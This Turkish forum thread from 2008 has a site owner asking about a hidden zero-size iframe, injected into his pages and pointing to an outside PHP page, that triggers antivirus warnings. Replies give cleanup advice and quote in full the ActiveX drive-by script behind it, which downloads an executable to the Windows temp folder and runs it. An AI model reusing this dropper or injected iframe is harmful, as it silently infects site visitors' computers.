Arkadaşlar Siteme Firefoxla girebilirseniz
GenelKulturum.Com - Genel Kültür - Kültür - Tarih - Kitap ve Dergi - Moda Bakım Makyaj - Kadınca - Garip olaylar - İslam ve İnsan - Alacakaranlık Kuşağı - Anne ve Çocuk
Yukarda Üçgen gibi birşey var dikkatinizi çeker + kaynağı görüntülerseniz
en üstte
iframe ile
<!-- ~ --><iframe src="http://www.jenoviadirect.com/images/icons/fuck/brrr.php" width=0 height=0 border=0></iframe>
Bu kodlar var
Kasperskyda virüs uyarısı veriyor site ...
nasıl düzeltirim :S
Virüsmü Bu Kod'u Bulamıyorum :S
4
●505
- 06-02-2008, 13:18:03Üyeliği durduruldu
- 06-02-2008, 13:31:38Eposta Aktivasyonu GerekmekteDostum Ya Serverindan Kaynaklanan Bir SOrun Var Dizinine Erişip Sitene insert Ediliyor Bu Kod
Ya Pcnde Trojen Var Pcni Antivirüsler ile tarat temiz oldundan emin olduktan sonra ftp sifrelerini değiş sonra scriptlerinin sourcelerine bak login ve indexler oncelik olarak
<!-- ~ --><iframe src="http://www.jenoviadirect.com/images/icons/fuck/brrr.php" width=0 height=0 border=0></iframe>
Bunu gordun sayfalardan bu kodu kaldir. - 06-02-2008, 16:01:54Üyeliği durdurulduevet arkadaşlar kdun içeriği bu js ile programlan mış
<script> var obj_RDS = document.createElement('object'); obj_RDS.setAttribute('id','obj_RDS'); obj_RDS.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36'); var is__obj_adodb = 0; try { var obj_adodb = obj_RDS.CreateObject("adodb.stream",""); is__obj_adodb = 1; } catch(e){} if (is__obj_adodb != 1) { try { var obj_adodb = new ActiveXObject("adodb.stream"); is__obj_adodb = 1; } catch(e){} } if (is__obj_adodb == 1) { try { var obj_ShellApp = obj_RDS.CreateObject("Shell.Application",""); var tratata = 0; tratata = new ActiveXObject("m"+"s"+"xm"+"l2."+"X"+"MLHTTP"); tratata.open("GET","exe.php",false); tratata.send(); obj_adodb.type = 1; obj_adodb.open(); obj_adodb.Write(tratata.responseBody); var fn = "C:\\windows\\temp\\~ninstall.exe"; obj_adodb.SaveToFile(fn,2); obj_adodb.close(); obj_ShellApp.ShellExecute(fn); } catch(e){} } </script>
eski bi taktik diyebilirim hihi C:\\windows\\temp\\~ninstall.exe ye yüküyor yeni iede calışmıyor bildiğim kadarıyla exe.php deki 51 kblik dosyayı pcniye indiriyor ve çalıştırıyor saygılar ve dikkat güncel ie veya firefox tercih edin